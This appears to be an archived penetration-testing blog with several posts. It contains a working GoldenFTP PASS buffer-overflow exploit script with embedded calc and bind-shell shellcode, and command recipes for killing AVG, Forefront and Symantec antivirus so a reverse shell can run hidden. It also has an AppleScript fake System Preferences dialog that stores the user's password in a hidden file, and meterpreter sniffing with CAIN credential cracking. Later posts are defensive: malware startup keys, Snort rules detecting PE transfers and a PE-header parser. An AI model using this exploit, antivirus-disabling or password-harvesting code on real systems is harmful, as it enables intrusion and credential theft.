When penetration testing and targeting Windows systems, writing some executable content to the file system is invariably required at some stage. Unfortunately, antivirus vendors have become quite adept at writing signatures that match the assembly stub routines used to inject malware into a system. The A/V products will also pick up on common service executable files such as those used with Metasploit's bypassuac. Let's face it, we still need to write stuff into temp directories from time to time.
Mark Baggett and Tim Tomes recently presented some nice techniques for hiding malware within Windows volume shadow copies (http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows). Since A/V products are unlikely to be able to scan volume shadow copies, and a process can be created from a volume shadow copy using 'wmic', we would likely want to follow this sequence of tasks during a test:
a) Disable the A/V product of choice.
b) Upload our favorite/useful executable content. (perhaps a reverse TCP meterpreter shell or similar)
c) Upload Mark and Tim’s excellent vssown.vbs script
a. Enable service and create volume shadow copy.
b. Disable volume shadow copy service.
d) Delete our favorite/useful executable content and modify timestamps accordingly, assuming we want to be somewhat stealthy.
e) Execute our content from the volume shadow copy using 'wmic', either through the excellent vssown script or directly through 'wmic process call create'.
The challenge presented is whether we can effectively disable the antivirus product of choice. Listed below are some possible techniques for three popular products which may get us what we need. None of these techniques are stealthy from a user interface perspective: Windows Security Center and the A/V tray executables themselves will try to inform the user that something is broken when we proceed with these recipes.
1. Grisoft’s AVG
Using the 2012 Freeware version, I note the following information about AVG. The services running are the AVG watchdog (avgwd) and the AVG IDS agent (avgidsagent). The running processes are avgidsagent.exe, avgwdsvc.exe, avgemca.exe, avgrsa.exe, avgcsrva.exe, and avgnsa.exe. The watchdog process is very persistent at restarting things; it cannot be killed, and its service cannot be stopped.
DISABLING:
a. Rename the binary files in %systemroot%\program files\avg\avg2012\ as follows.
C:\> cd %systemroot%\program files\avg\avg2012
C:\> move avgcsrva.exe avgcsrva_.exe
C:\> move avgemca.exe avgemca_.exe
C:\> move avgnsa.exe avgnsa_.exe
C:\> move avgrsa.exe avgrsa_.exe
b. Kill the running processes simultaneously with a one-line (wildcard powered) wmic command.
C:\> wmic process where "name like 'avg[cenr]%.exe'" delete
c. The watchdog service will try to restart all of the binaries but fail.
ENABLING: Rename all of the binaries back to their original names, and the watchdog process will take care of the rest.
2. Microsoft Forefront
The service name is “msmpsvc”, and the running processes are msmpeng.exe, and msseces.exe, one being the engine and the other being the GUI reporting/configuration tool respectively.
DISABLING: kill the GUI tool and stop the A/V engine service.
C:\> wmic process where name="msseces.exe" delete
C:\> sc stop msmpsvc
ENABLING: start the A/V service engine, and start the GUI process.
C:\> cd \Program Files\Microsoft Security Client
C:\> sc start msmpsvc
C:\> msseces.exe
3. Symantec Endpoint Protection
The services running are ccEvtMgr, ccSetMgr, smcservice, and "Symantec AntiVirus". The processes that matter are smc.exe and smcgui.exe.
DISABLING: kill the processes, and stop the services. I found that the event manager (ccEvtMgr) and settings manager (ccSetMgr) services can remain running without any impact.
C:\> wmic process where "name like '%smc%.exe'" delete
C:\> sc stop smcservice
C:\> sc stop "Symantec AntiVirus"
ENABLING: restarting just the smcservice will start everything else back up again.
C:\> sc start smcservice
Monday, December 5, 2011
Tuesday, October 25, 2011
Fun with AppleScript
--
-- Description: This script prompts the user to enter their password
-- in order to perform a privileged function. The password
-- is subsequently saved to a hidden file in their home directory.
-- The "Cancel" button is the default on the dialog which
-- will hopefully encourage the user to enter accurate info.
--
-- Author: Joff Thyer, October 2011
--
set filename to ((path to home folder) as string) & ".mpass"
set myprompt to "Type your password to allow System Preferences to make changes"
set ans to "Cancel"
repeat
try
set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "Cancel" with icon path to resource "LockedIcon.icns" in bundle "/System/Library/CoreServices/CoreTypes.bundle"
set ans to button returned of d_returns
set mypass to text returned of d_returns
if ans = "OK" then exit repeat
end try
end repeat
try
set now to do shell script "date '+%Y%m%d_%H%M%S:'"
set myfile to open for access filename with write permission
set outstr to now & mypass & "
"
write outstr to myfile starting at eof
close access myfile
on error
try
close access myfile
end try
end try
Friday, July 15, 2011
Using metasploit meterpreter scripts enum_firefox.rb and enum_chrome.rb
Two useful meterpreter scripts for enumerating client browser data are enum_firefox.rb and enum_chrome.rb located in the framework scripts/meterpreter directory.
It is important to understand that both of these scripts require sqlite3 be properly installed on your exploitation system. Assuming your exploitation system is Ubuntu Linux for a moment, you can ensure that sqlite3 dependencies are installed as follows:
sudo apt-get install sqlite3
sudo apt-get install libsqlite3-dev
sudo gem install sqlite3-ruby
Once this has completed, then restart your msfconsole, exploit away and run the appropriate browser enumeration scripts. Output from your enumeration will be stored in the msf config directory with the following path.
log/scripts/enum_firefox
log/scripts/enum_chrome
With a local installation under Ubuntu, the msf config directory is often $HOME/.msf
Friday, July 8, 2011
Revised V2.5 Golden FTP 4.70 PASS overflow exploit
#!/usr/bin/python
#
###########################################################################
## Exploit Title: Revised V2.5: GoldenFTP 4.70 PASS overflow exploit
## Exploit Version: 2.5, 2011-07-08 15:00
## Date: July 8, 2011 (20110708-1500)
## Author: Joff Thyer (jsthyer@gmail.com)
## Software Link: http://www.goldenftpserver.com/
## Version: 4.70
## Tested on: WinXP-SP0/SP2/SP3
## CVE: 2006-6576
##
## based on exploit by:
## Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
##
## NOTES:
## (1) You must make sure that the "Show new connections" option is enabled
## in order for this exploit to work.
## (2) Specifying the IP source address is important as it is used in the
## calculation of the overflow buffer offset.
###########################################################################
#
import socket
import sys
from subprocess import Popen, PIPE
import re
import time
# Metasploit
# ./msfpayload windows/exec CMD=calc.exe r | ./msfencode -b '\x00\x0a\x0d' -c 3
# 281 bytes
calc = \
"\xda\xd8\xbf\xbd\xe6\x2a\x25\xd9\x74\x24\xf4\x5d\x2b\xc9" +\
"\xb1\x40\x31\x7d\x19\x03\x7d\x19\x83\xc5\x04\x5f\x13\xf0" +\
"\xfc\x25\x7d\x71\xce\xb6\xa7\x0e\x14\xbc\x03\xc4\x9d\x8d" +\
"\x8d\x2b\x4d\xf7\xee\x18\x6b\x84\x32\x9a\x69\xde\x1d\x56" +\
"\x5b\x3c\x2b\x9b\xd7\x9f\x60\x60\x07\x1a\x80\xa2\x81\xae" +\
"\xce\x53\x0c\x41\x2a\x63\xce\xe5\x8c\xb1\x14\x78\x13\x69" +\
"\x5b\xe0\x83\x33\x30\x96\x31\x89\x93\x5f\x95\x5c\xe5\x63" +\
"\x23\x44\xfa\xe4\xe4\xbc\x75\x83\xb8\x5e\xa3\x1f\x86\x37" +\
"\xc8\xf4\x89\xab\x9d\x6e\x65\xac\x65\xfc\x7b\xe9\x86\xe6" +\
"\x8f\x25\x93\x03\xd4\x1d\x7f\x73\x91\xc4\x68\x67\x62\x59" +\
"\xe0\x5f\x51\x08\xfb\xd7\x1f\xb6\x5a\x27\xe9\x35\x61\x3e" +\
"\xf8\x4c\xac\x19\x43\x47\x2b\x13\x92\x9e\x1a\xed\xfd\x45" +\
"\x98\x34\x2a\x83\xb4\x84\x2e\xa0\x67\x24\x44\x5b\x32\x0b" +\
"\xbf\x5b\x7a\x9f\xa6\xc8\xd7\xaf\x04\xb9\xa2\x53\x5f\xfd" +\
"\x6f\x5b\x32\x77\xb2\x5b\xec\x53\xa1\x12\x29\x88\x5d\x0f" +\
"\x27\x92\x8b\xca\x63\x38\x4d\x1b\xd2\x26\x0e\xf8\xdf\xf4" +\
"\xef\x8f\x14\x63\xf2\x81\x9e\x60\xb0\xc6\xbe\x97\x1e\x27" +\
"\x32\x8f\x88\x29\x3e\xa4\xbe\xd6\x45\xaa\x70\xcd\x8a\xf6" +\
"\xcd\xa0\x15\x5b\x4b\x73\xde\x3c\xa6\x33\x7d\xa5\xa9\xda" +\
"\x0b\xdf\xc3\xd9\xe9\x81\x5a\xbb\x77\x47\x45\x75\xf9\x5f" +\
"\x88"
# Metasploit
# ./msfpayload windows/exec CMD=windows/shell_bind_tcp r | ./msfencode -b '\x00\x0a\x0d' -c3
# 422 bytes
cmdshell = \
"\xd9\xce\xba\xd6\x6f\x98\xda\xd9\x74\x24\xf4\x5f\x33\xc9" +\
"\xb1\x63\x31\x57\x1a\x03\x57\x1a\x83\xef\xfc\xe2\x23\xd5" +\
"\x9d\x94\x67\x5c\x47\xea\xae\xd5\x53\x1f\x0e\x3f\x55\x6e" +\
"\xf3\x0e\x33\x83\x08\x27\xa9\x20\xe5\x75\x83\xa5\xb5\x66" +\
"\x03\x32\x7d\xe2\xf5\xfa\x35\x4c\x0f\x9b\x44\x05\x5b\x98" +\
"\x24\x7d\xf0\xc3\xb6\xa2\x68\x9c\x42\xed\x08\x82\xfe\xbb" +\
"\x7e\xcf\x76\x76\x97\x38\xeb\xb1\x98\xd6\x51\x8b\xca\xae" +\
"\xea\x2b\x72\x86\x3b\x67\x6a\x9f\x5d\xf2\x4c\xb8\x23\x10" +\
"\x95\xd3\x01\x41\x09\x36\x93\x41\xaa\xb5\x84\xd9\x35\xb0" +\
"\x44\x13\xc0\x38\x6b\xab\x1a\x8c\xb7\xec\x30\x7a\x4a\x73" +\
"\xe5\xf1\x7e\x7e\xaf\x66\xa1\x85\x53\xea\x1a\xd7\x0b\x9a" +\
"\x9e\xf0\x04\x63\xe0\x57\xf6\x6a\x88\xb1\xef\xe0\x4a\x78" +\
"\x63\xdb\xcf\xe6\xde\xcf\xe9\x2c\x94\x5f\xef\x28\x2a\xdc" +\
"\xcd\x7a\xb2\x13\x88\xb1\x8d\x40\xcf\x0c\xf9\x52\x2f\xbc" +\
"\xd4\x34\xad\xb0\x45\xfb\xe2\xa3\xab\xa7\x46\xf6\x83\x38" +\
"\xe0\x36\x75\x7a\x6f\x96\xb3\x4f\xbe\xb9\x17\xbd\xea\x0e" +\
"\xf9\x10\x62\x2e\x91\x69\x28\xeb\xe6\x07\x23\x0f\xf6\x26" +\
"\x4a\xec\xba\xd8\x74\xba\xe6\x38\xb3\x56\x13\xf1\x8d\x70" +\
"\x98\xc9\x60\xcf\x9c\xf5\x1f\x8f\x8f\x04\x6c\x61\x63\x25" +\
"\x87\x89\x1d\x58\x4f\x18\xca\xcb\x11\x03\x24\x6b\xa6\xbd" +\
"\x47\x90\x43\xc5\x9f\x3f\xc8\x64\x3a\xcc\x69\xc7\x9c\x2d" +\
"\x19\xc1\x67\xfa\x07\xcb\xd7\x92\x83\x23\x50\xdf\xa2\xd8" +\
"\x08\xa8\xec\x43\xbb\xda\x10\xc2\x0b\x30\xb7\xdd\xbd\x33" +\
"\x6a\x18\x98\x1e\xc1\x5e\x77\xeb\xe8\x21\x4e\x18\x60\x6f" +\
"\x60\x5c\x99\xb6\x7e\x28\xdb\xda\x40\xea\x8c\xc7\x5c\x70" +\
"\x7f\xd1\x61\xaf\x42\x25\x8d\xec\xb9\xde\x5f\x40\xa2\xa2" +\
"\xe2\x39\x6f\x85\x54\xd3\xa0\xef\x4c\x08\x23\xb5\x88\x85" +\
"\xc0\xfc\xd2\x50\x68\x5b\x93\x33\x8a\x6e\xf8\x4d\x79\xa8" +\
"\x29\x56\x39\xee\x4f\xd2\x49\x48\x4e\x0e\x1c\x8a\xd5\xa6" +\
"\xd0\x94\xfb\xda\x22\x3d\xf4\x22\xe7\x54\xff\xa2\x05\xc4" +\
"\x8c\xc7"
if len(sys.argv) < 5:
    print "[-]Usage: %s <src addr> <target addr> <shellcode> <platform>" % sys.argv[0]
    print "\tshellcode = (calc|shell)"
    print "\tplatform = (sp0|sp2|sp3)"
    print "\tExample: ./gftp-sploit.py 1.2.1.2 5.6.5.4 calc sp2"
    sys.exit(0)
srcaddr = sys.argv[1]
target = sys.argv[2]
shellcode = sys.argv[3]
platform = sys.argv[4]
# which payload?
buf = calc
if shellcode == "calc":
    buf = calc
elif shellcode == "shell":
    buf = cmdshell
# address of JMP ESI in Kernel32.dll
if platform == "sp0":
    jmpesi = "\x7b\x15\xe8\x77"
elif platform == "sp2":
    jmpesi = "\xc3\x72\x85\x7c"
elif platform == "sp3":
    jmpesi = "\x0b\xda\x82\x7c"
else:
    # unknown platform: jmpesi would otherwise be undefined below
    print "[-] Unknown platform '%s', expected sp0, sp2 or sp3" % platform
    sys.exit(0)
shortjmp = "\x90\x90\x90\x90\xeb\x20\n"
nopsled = "\x90" * 60
padding = "A" * (533 - len(srcaddr + buf + nopsled))
payload = nopsled + buf + padding + jmpesi
print "\
[+] Golden FTP PASS Exploit\n\
[+] Version 2.5, July 8 2011\n\
[+] Author: Joff Thyer (jsthyer@gmail.com)\n\
[+] 'Show new connections' must be enabled in GoldenFTP in order\n\
[+] for this exploit to succeed!\n\
[+] Connecting: "+target
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
    s.connect((target,21))
except:
    print "[-] Connection to "+target+" failed!"
    sys.exit(0)
print "[+] Sending payload, length = " + `len(payload)`
s.send(shortjmp)
s.send("USER anonymous\n")
s.send("PASS " + payload + "\n")
s.recv(1024)
print "[+] Sleeping 2 secs..."
time.sleep(2)
s.close()
if shellcode == "shell" and srcaddr == target:
    p = Popen(["netstat","-na"],stdout=PIPE,shell=False)
    netstat = p.stdout.read()
    shellok = re.search("TCP\s*0\.0\.0\.0:4444.*LISTENING",netstat)
    if shellok:
        print "[+] "+shellok.group(0)
print "[+] Done."
sys.exit(0)
Thursday, June 2, 2011
Using CAIN to read packet captures during a Penetration Test
There are many ways to leverage transitive trust relationships in an environment when performing Penetration Testing. Once privileged level access is obtained on a single Windows system, hashes can usually be obtained, and it is often the case that shared credentials exist. In an environment which only uses LANMAN/NTLMv1 challenge/response and fixed stored hashes, it is well known that access to other Windows systems can be trivially obtained with nothing more than the stored hashes.
Within the Metasploit framework exists the 'windows/smb/psexec' module, which works in a similar fashion to the Microsoft Sysinternals PSEXEC command but can also "pass the hash" by setting the SMBPass variable to a LANMAN:NT hash rather than a plaintext password. This can be a useful way to pivot through to other systems once a single set of hashes is obtained.
A feature of the Metasploit Meterpreter I found useful in a recent Penetration Test is the 'sniffer' module. This module will allow you to capture up to 50,000 packets from an exploited system and download the captured data to a libpcap compatible file.
meterpreter > use sniffer
Loading extension sniffer...success.
meterpreter > sniffer_interfaces
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:false wifi:false )
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
packets: 1849
bytes: 444042
meterpreter > sniffer_dump 2 myfile.pcap
meterpreter > sniffer_stop 2
During a recent Pen Test, I happened to gain access to a network monitoring system. This is the near perfect scenario to leverage the meterpreter sniffer module.
CAIN (www.oxid.it) is most often thought of as a layer 2 network interception and man in the middle tool with an incredibly useful set of password hash analysis and cracking abilities. CAIN has the ability to perform cryptanalysis using traditional rcrack style rainbow tables as well as the ophcrack format rainbow tables. Password cracking can also be done using dictionary or brute force mode.
What is usually overlooked is that CAIN can read libpcap files and process the contents, parsing out all of the useful various application and O/S password hash formats. To perform this libpcap file parsing in CAIN is a simple click on the open folder looking icon in the top left of the menu bar. It is hard to find because the typical "open file" entry does not exist in the file menu.
I used this capability to parse through sniffer packet captures from compromised systems, and managed to further my intrusion into the environment significantly in the process. Cryptanalysis, dictionary and bruteforce attacks can be leveraged against captured LANMAN/NT challenge response transactions. Dictionary and bruteforce attacks can be used against Oracle, and MySQL database credentials which are often weak. SNMP version 1 community strings are obviously plaintext and easy to capture. MSSQL in older days uses TDS (Unicode XOR with 0xa5) which is easily reversible. It is also quite interesting to see how much plaintext LDAP can be leveraged for access also.
Within the Pen Testing context, obtaining access and obtaining passwords with associated cracking time is a huge component. However, we cannot forget that demonstrating access to real data is important to show there exists real risk.
I find that the most interesting demonstration of this is to show that you can access database tables. However, one must tread carefully in this area. When demonstrating this access, try showing some table names, some column names and such without actually pulling database rows themselves. The idea is to prove you own it, and you're there without putting sensitive data into your reports. Redacted screenshots can work well in this context also.
With regard to database client software, the most challenging area is to get a functional Oracle PL*SQL client working. The installation is a little tricky but if you have access to a handy and friendly DBA, you can be up and running pretty quickly.
Microsoft SQL servers often have the command line utility named OSQL.EXE actually on the server itself, and PWDUMPX is useful for pulling LSA secrets from the Windows registry which often contain database credentials.
The MySQL command line client is a simple installation, especially with Linux distros like Ubuntu, so that should not present much challenge.
Monday, April 11, 2011
Windows XP Startup/Logon Process and Malware
Recently I had to rescue my daughter's PC from some nasty malware. For many security professionals, troubleshooting family systems is a common weekend / after hours challenge, and a lot of us are not in the business of desktop remediation.
I find that the ISO based whole system virus scanners are not a bad starting point to get rid of the low hanging fruit. I have used F-Secure, and Kaspersky among others.
I also find that after the scanning/remediation process, XP registry entries are often still broken leading a lot of people to the point of just re-installing. Of course, re-installing is sometimes the only option for deeply embedded malware and/or rootkit.
A tool I found useful when I was poking through the HKEY_USERS registry hive was 'USER2SID', since those registry entries are keyed by the SID. I also found that the malware I was dealing with had re-written the 'exefile' and '.exe' startup shell keys to point to its own EXE file, which was somewhat frustrating when that malware exe file was finally missing. (i.e. Windows kept asking what program to open an exe with!!)
Also, age old advice is to remember those program startup registry keys which are often used to infect/re-infect things:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup
%systemdrive%\Documents and Settings\username\Start Menu\Programs\Startup
%windir%\Profiles\All Users\Start Menu\Programs\Startup
%windir%\Profiles\username\Start Menu\Programs\Startup
Don't forget about our old SysInternals tools, particularly 'AutoRuns' and 'Process Explorer' which I continue to find extremely useful.
The Windows utility SFC.EXE is useful for a diff scan of critical system files as long as it has not been compromised.
*** Always use READ-ONLY media when in a desktop incident response situation like this otherwise anything goes with regard to what is written to your favorite USB memory stick!
Detecting PECOFF EXE/DLL files with Snort
Some time ago, I became interested in parsing the PECOFF file format. As a result, I authored several different Snort rules to detect the transfer of either an EXE or DLL file of different varieties. Listed below are rules for both i386/32-bit and x86-64-bit. Additionally, there is a set of rules for UPX Packed EXE files.
Hopefully readers and Snort fans will find these useful.
# i386 32-bit EXE over TCP
log tcp any any -> any any (msg:"LOCAL: i386 PE32 EXE File Xfer"; flowbits:isnotset,upx.exe.packed; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; flowbits:unset,upx.exe.packed; sid:4963001; rev:1;)
# i386 32-bit DLL over TCP
alert tcp any any -> any any (msg:"LOCAL: i386 PE32 DLL File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963002; rev:1;)
# x86 64-bit EXE over TCP (IMAGE_FILE_MACHINE_AMD64 is 0x8664, stored little-endian as |64 86|)
alert tcp any any -> any any (msg:"LOCAL: x86 PE32+ EXE File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||64 86|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 02|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963101; rev:1;)
# x86 64-bit DLL over TCP
alert tcp any any -> any any (msg:"LOCAL: x86 PE32+ DLL File Xfer"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||64 86|"; byte_test:2,&,0x2000,16,relative,little; content:"|0B 02|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; sid:4963102; rev:1;)
# UPX Packed EXE over TCP
alert tcp any any -> any any (msg:"LOCAL: i386 PE32 UPX Packed EXE File Xfer over TCP"; flow:established; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; content:"UPX0"; within:172; content:"|00 04 00 00|"; distance:16; within:4; content:"|80 00 00 E0|"; distance:12; within:4; flowbits:set,upx.exe.packed; sid:4963201; rev:1;)
# UPX Packed EXE over UDP
alert udp any any -> any any (msg:"LOCAL: i386 PE32 UPX Packed EXE File Xfer over UDP"; content:"|4D 5A 90 00|"; depth:512; byte_jump:4,56,relative,little; content:"|50 45 00 00||4C 01|"; byte_test:2,!&,0x2000,16,relative,little; content:"|0B 01|"; distance:18; within:2; content:"|00 00 00 00|"; distance:50; within:4; content:"UPX0"; within:172; content:"|00 04 00 00|"; distance:16; within:4; content:"|80 00 00 E0|"; distance:12; within:4; flowbits:set,upx.exe.packed; sid:4963301; rev:1;)
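Added example (not part of the original post): a Python 3 parser that walks the same PE/COFF fields the rules above test (MZ stub, e_lfanew at 0x3C, PE signature, Machine, Characteristics bit 0x2000, optional header Magic, the reserved Win32VersionValue, and the UPX0 section header values), so the byte offsets and magic values in the rules can be checked against a synthetic header before deploying them. It generalizes slightly by scanning every section header for UPX0 rather than the rule's fixed 172-byte window, and the sample headers it builds are constructed inline for testing; they are not real binaries.

```python
"""Classify PE/COFF headers using the same fields the Snort rules above match on."""
import struct

IMAGE_FILE_MACHINE_I386 = 0x014C   # "|4C 01|" in the rules
IMAGE_FILE_MACHINE_AMD64 = 0x8664  # "|64 86|" once written little-endian
IMAGE_FILE_DLL = 0x2000            # Characteristics bit the byte_test checks
PE32_MAGIC = 0x10B                 # "|0B 01|"
PE32PLUS_MAGIC = 0x20B             # "|0B 02|"
UPX0_RAW_PTR = 0x400               # "|00 04 00 00|" PointerToRawData of UPX0
UPX0_CHARACTERISTICS = 0xE0000080  # "|80 00 00 E0|" section flags of UPX0


def classify_pe(data):
    """Return a label matching the rule msg strings, or None if no rule applies."""
    # DOS header: "MZ" stub, e_lfanew (offset of the PE signature) at 0x3C.
    if len(data) < 0x40 or data[:4] != b"MZ\x90\x00":
        return None
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    # Need signature (4) + COFF header (20) + first 56 bytes of optional header.
    if pe + 80 > len(data) or data[pe:pe + 4] != b"PE\x00\x00":
        return None
    machine, nsections = struct.unpack_from("<HH", data, pe + 4)
    opt_size, characteristics = struct.unpack_from("<HH", data, pe + 20)
    opt_magic = struct.unpack_from("<H", data, pe + 24)[0]
    # Win32VersionValue sits at optional-header offset 52 and is reserved (0);
    # the rules check it with content:"|00 00 00 00|"; distance:50; within:4.
    if struct.unpack_from("<I", data, pe + 76)[0] != 0:
        return None
    if machine == IMAGE_FILE_MACHINE_I386 and opt_magic == PE32_MAGIC:
        arch = "i386 PE32"
    elif machine == IMAGE_FILE_MACHINE_AMD64 and opt_magic == PE32PLUS_MAGIC:
        arch = "x86 PE32+"
    else:
        return None
    kind = "DLL" if characteristics & IMAGE_FILE_DLL else "EXE"
    section_table = pe + 24 + opt_size
    if arch == "i386 PE32" and kind == "EXE" and _has_upx0_section(data, section_table, nsections):
        return "i386 PE32 UPX Packed EXE"
    return "%s %s" % (arch, kind)


def _has_upx0_section(data, table, nsections):
    """Mirror the UPX rule: name UPX0, PointerToRawData 0x400, Characteristics 0xE0000080."""
    for i in range(nsections):
        off = table + 40 * i          # each IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            return False
        name = data[off:off + 8]
        raw_ptr = struct.unpack_from("<I", data, off + 20)[0]
        flags = struct.unpack_from("<I", data, off + 36)[0]
        if name.startswith(b"UPX0") and raw_ptr == UPX0_RAW_PTR and flags == UPX0_CHARACTERISTICS:
            return True
    return False


def build_sample(machine, dll=False, upx=False):
    """Construct a synthetic header-only layout for testing (constructed, not a real binary)."""
    plus = machine == IMAGE_FILE_MACHINE_AMD64
    opt_size = 240 if plus else 224
    magic = PE32PLUS_MAGIC if plus else PE32_MAGIC
    characteristics = 0x0002 | (IMAGE_FILE_DLL if dll else 0)  # EXECUTABLE_IMAGE [| DLL]
    sections = []
    if upx:
        sections.append((b"UPX0", UPX0_RAW_PTR, UPX0_CHARACTERISTICS))
    sections.append((b".text", 0x400, 0x60000020))
    dos = b"MZ\x90\x00" + b"\x00" * 56 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", machine, len(sections), 0, 0, 0,
                                       opt_size, characteristics)
    opt = bytearray(opt_size)            # Win32VersionValue at offset 52 stays zero
    struct.pack_into("<H", opt, 0, magic)
    table = b"".join(
        name.ljust(8, b"\x00")
        + struct.pack("<IIIIIIHHI", 0x1000, 0x1000, 0x200, raw, 0, 0, 0, 0, flags)
        for name, raw, flags in sections)
    return dos + coff + bytes(opt) + table


if __name__ == "__main__":
    for m, d, u in [(IMAGE_FILE_MACHINE_I386, False, False), (IMAGE_FILE_MACHINE_I386, True, False),
                    (IMAGE_FILE_MACHINE_AMD64, False, False), (IMAGE_FILE_MACHINE_I386, False, True)]:
        print(classify_pe(build_sample(m, d, u)))
```

Feed a real file's first kilobyte to classify_pe and compare the label with the rule that fired to confirm the offsets line up on your sensor.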